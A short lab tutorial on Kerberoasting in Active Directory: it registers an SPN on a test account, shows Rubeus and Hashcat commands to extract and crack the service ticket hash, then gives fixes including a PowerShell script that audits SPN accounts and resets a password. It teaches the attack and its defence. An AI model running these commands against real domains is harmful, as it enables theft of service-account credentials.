# Kerberoasting

## Making the Lab

Set up a general Active Directory (AD) lab.

Add a new user called SQLService.

Open a command prompt on the DC and register an SPN for the account:

```
setspn -a <DC-NAME>/SQLService.<domain>.local:60111 <DOMAIN>\SQLService
```

You can then verify that the SPN can be found:

```
setspn -T <DOMAIN>.local -Q */*
```

## Abuse

Rubeus is the simplest way:

```
rubeus.exe kerberoast /simple /nowrap
```

Use Hashcat to crack the hash:

```
hashcat kerb.txt -m 13100 /usr/share/wordlists/rockyou.txt --force
```

## Fixing

You could remove the SPN from the account, but that would break things.

The real fix is to use a strong password for the service account. It can be changed with:

```
net user SQLService NewPasswordThatShouldBeStrong
```
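
An added example (not part of the original notes) that carries out this fix with the ActiveDirectory PowerShell module: it lists the user accounts that carry an SPN together with their password age, then resets the lab's SQLService account to a random password. The `New-RandomPassword` helper, its alphabet and the length of 32 are assumptions made for this example.

```powershell
# Added example; assumes the RSAT ActiveDirectory module and rights to reset
# the target account's password.
Import-Module ActiveDirectory

# 1. List user accounts that carry an SPN, oldest password first.
#    krbtgt carries an SPN by design, so it is filtered out.
Get-ADUser -Filter 'ServicePrincipalName -like "*"' `
        -Properties ServicePrincipalName, PasswordLastSet |
    Where-Object { $_.SamAccountName -ne 'krbtgt' } |
    Sort-Object PasswordLastSet |
    Select-Object SamAccountName, PasswordLastSet,
        @{ Name = 'SPNs'; Expression = { $_.ServicePrincipalName -join '; ' } } |
    Format-Table -AutoSize

# 2. Hypothetical helper: build a password from a cryptographic RNG.
function New-RandomPassword {
    param([int]$Length = 32)
    $alphabet = ('ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnpqrstuvwxyz' +
                 '23456789!#%+-_=?').ToCharArray()
    $rng   = [System.Security.Cryptography.RandomNumberGenerator]::Create()
    $bytes = New-Object byte[] 4
    try {
        $chars = for ($i = 0; $i -lt $Length; $i++) {
            $rng.GetBytes($bytes)
            $alphabet[[int]([BitConverter]::ToUInt32($bytes, 0) % $alphabet.Length)]
        }
    } finally {
        $rng.Dispose()
    }
    -join $chars
}

# 3. Reset the lab account from this page to a long random password.
$account = 'SQLService'
$plain   = New-RandomPassword -Length 32
Set-ADAccountPassword -Identity $account -Reset `
    -NewPassword (ConvertTo-SecureString $plain -AsPlainText -Force)

# 4. Confirm the change took effect.
Get-ADUser -Identity $account -Properties PasswordLastSet |
    Select-Object SamAccountName, PasswordLastSet
```

Store `$plain` in a password vault and update the logon credentials of any service that runs as the account, otherwise that service stops authenticating.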
